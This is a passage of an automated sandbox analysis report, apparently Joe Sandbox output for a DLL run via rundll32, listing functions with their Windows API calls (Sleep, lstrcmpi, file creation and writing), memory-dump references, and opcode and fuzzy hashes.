                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: lstrcmpi
                              • String ID:
                              • API String ID: 1586166983-0
                              • Opcode ID: 674d5733410fdc44829c5af2cc6ff86ead170543a98c4741c94542f0773d9792
                              • Instruction ID: ab44963cc35f3ed2a3e9543a8ab3320ebbcead6cbf3dcf8efc653e332c127c69
                              • Opcode Fuzzy Hash: 674d5733410fdc44829c5af2cc6ff86ead170543a98c4741c94542f0773d9792
                              • Instruction Fuzzy Hash: CDF0A775A01108ABEF509F64DC05E997778A712245F40C119B90666A60DB30556D8BA1
                              Function 6CD52210 Relevance: 1.3, APIs: 1, Instructions: 26sleepCOMMON
                              Download Yara Rule
                              APIs
                              • Sleep.KERNEL32(6CD51519,6CD51519,00000BB8,00000000,00000000), ref: 6CD5225E
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: Sleep
                              • String ID:
                              • API String ID: 3472027048-0
                              • Opcode ID: edf6a095fdad8a5a78be644f7679bee5ec9700c504c564f1a52b7c0f0633cdec
                              • Instruction ID: de164c1064fa330fdfed937778533290d94e84de4978e00b52ffbc5c560cd5ff
                              • Opcode Fuzzy Hash: edf6a095fdad8a5a78be644f7679bee5ec9700c504c564f1a52b7c0f0633cdec
                              • Instruction Fuzzy Hash: 31E02B74E022046BEF109FB4DC45F9A377CEB06349F800125FA0266A61EB30143C86F1

                              Non-executed Functions

                              Function 6CD52680 Relevance: 7.6, APIs: 5, Instructions: 63fileCOMMON
                              Download Yara Rule
                              APIs
                              • CreateFileW.KERNEL32(00000000,6CD7835C,00000016,F6A49D28,6CD81084,40000000,00000001,00000000,00000004,00000000,00000000), ref: 6CD526DB
                              • GetLastError.KERNEL32 ref: 6CD52713
                              • SetFilePointer.KERNEL32(000000FF,00000000,00000000,00000002), ref: 6CD52725
                              • WriteFile.KERNEL32(000000FF,?,?,?,00000000), ref: 6CD5273D
                              • CloseHandle.KERNEL32(000000FF), ref: 6CD52747
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: File$CloseCreateErrorHandleLastPointerWrite
                              • String ID:
                              • API String ID: 170361235-0
                              • Opcode ID: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction ID: 3f1f36d020c915cd592e4e3ecba8d4696b71eb4a9c80d4df09b741fc4652f337
                              • Opcode Fuzzy Hash: a496d619c835c7e43a0b919234d6636ae76c08fb0e7d2e8cc643519b85aa9907
                              • Instruction Fuzzy Hash: 8E219070B10204AFEF14DFA4CD4AF9937B8AB46704F50811AF705AB6D0DB30A9058BA0
                              Function 6CD6E650 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                              Download Yara Rule
                              APIs
                              Memory Dump Source
                              • Source File: 0000001E.00000002.3965809546.000000006CD51000.00000020.00000001.01000000.00000003.sdmp, Offset: 6CD50000, based on PE: true
                              • Associated: 0000001E.00000002.3965781157.000000006CD50000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965841046.000000006CD78000.00000002.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965860803.000000006CD7D000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965890619.000000006CDD7000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 0000001E.00000002.3965911426.000000006CDEA000.00000002.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_30_2_6cd50000_rundll32.jbxd
                              Similarity
                              • API ID: codecvt
                              • String ID:
                              • API String ID: 3662085145-0
                              • Opcode ID: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction ID: 646a2e5a06cecb3fb507baee41b3abc8541b517d25ab7457d06c7c1104f644e0
                              • Opcode Fuzzy Hash: 37320b71a7be83556b002174ec9fc3dd33e1032fb330f3e4f87ae76041f4c033
                              • Instruction Fuzzy Hash: 6431C678A0120ADFEB04EF95D994BADB7BABB95308F104419D62137FA0D7752A84CF90